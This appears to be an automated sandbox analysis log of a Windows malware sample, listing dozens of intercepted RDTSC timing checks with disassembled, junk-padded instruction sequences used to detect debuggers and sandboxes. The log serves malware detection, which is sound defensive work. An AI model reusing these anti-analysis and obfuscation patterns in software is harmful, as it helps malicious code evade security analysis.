                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103246F second address: 1032473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1033370 second address: 103337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103337A second address: 1033386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1034278 second address: 103427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10335B2 second address: 10335C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F449CEB0736h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10335C5 second address: 10335CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103838E second address: 10383CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D367Eh], ebx 0x0000000f push 00000000h 0x00000011 mov ebx, 16405702h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F449CEB0738h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 jg 00007F449CEB0736h 0x0000003e popad 0x0000003f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1035562 second address: 1035568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103741C second address: 1037420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103856B second address: 103859B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1038687 second address: 103868B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103868B second address: 10386B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F449CC63D89h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10386B1 second address: 10386B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103A6D9 second address: 103A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3D6 second address: 103B3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103A6DD second address: 103A6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3DD second address: 103B3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F449CEB0736h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F449CEB0740h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3F4 second address: 103B45D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F449CC63D78h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F449CC63D78h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f sub bx, E340h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F449CC63D87h 0x0000004c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B5EB second address: 103B5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B5F0 second address: 103B6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F449CC63D90h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F449CC63D78h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jo 00007F449CC63D7Ch 0x00000031 mov dword ptr [ebp+122D1E1Bh], ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov dword ptr [ebp+124492C4h], edx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F449CC63D78h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov eax, dword ptr [ebp+122D13A1h] 0x0000006b mov bx, ax 0x0000006e push FFFFFFFFh 0x00000070 movsx ebx, dx 0x00000073 mov dword ptr [ebp+122D1E36h], edx 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c jnp 00007F449CC63D76h 0x00000082 jbe 00007F449CC63D76h 0x00000088 popad 0x00000089 push eax 0x0000008a push edx 0x0000008b jng 00007F449CC63D76h 0x00000091 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10428FE second address: 1042911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F449CEB0736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F449CEB0736h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10231A6 second address: 10231AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE914 second address: FDE923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE923 second address: FDE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE92D second address: FDE931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE931 second address: FDE943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007F449CC63D76h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A400 second address: 104A454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 jp 00007F449CEB0743h 0x0000000d jmp 00007F449CEB073Dh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jl 00007F449CEB0742h 0x0000001c jmp 00007F449CEB073Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F449CEB0744h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e je 00007F449CEB0738h 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A50F second address: 104A533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D81h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A533 second address: 104A539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A539 second address: 104A53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A53D second address: 104A553 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A553 second address: 104A557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A557 second address: 104A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A55D second address: 104A563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A563 second address: 104A572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A572 second address: 104A576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F68E second address: 104F692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F692 second address: 104F6B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CC63D76h 0x00000008 jmp 00007F449CC63D89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F6B8 second address: 104F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F449CEB0736h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F6C8 second address: 104F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F449CC63D76h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104FC37 second address: 104FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F449CEB0736h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F449CEB073Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104FF2E second address: 104FF3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054AC4 second address: 1054ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BE3 second address: 1054BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BE8 second address: 1054BF2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BF2 second address: 1054BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105505E second address: 1055064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1055064 second address: 1055084 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D7Ch 0x00000008 pushad 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090CC3 second address: 1090CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 108FE62 second address: 108FE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 jmp 00007F449CC63D89h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090424 second address: 109042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109042A second address: 109044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 jmp 00007F449CC63D7Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109044B second address: 109044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109044F second address: 1090453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090A03 second address: 1090A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090A07 second address: 1090A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1096EC8 second address: 1096ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097041 second address: 109705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F449CC63D76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007F449CC63D7Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10975DF second address: 10975E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10975E5 second address: 1097605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F449CC63D78h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F449CC63D76h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097605 second address: 1097609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097755 second address: 109775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109775A second address: 109775F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097B9F second address: 1097BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097BA5 second address: 1097BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097BAA second address: 1097BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1098C8B second address: 1098C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1428 second address: 10A142C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1592 second address: 10A1596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1773 second address: 10A177D instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CC63D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2AB second address: 10AE2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F449CEB0736h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2BD second address: 10AE2C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2C1 second address: 10AE2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB073Eh 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE011 second address: 10AE034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D7Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F449CC63D7Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE034 second address: 10AE04B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B107A second address: 10B107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B107E second address: 10B108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B4FA5 second address: 10B4FC1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
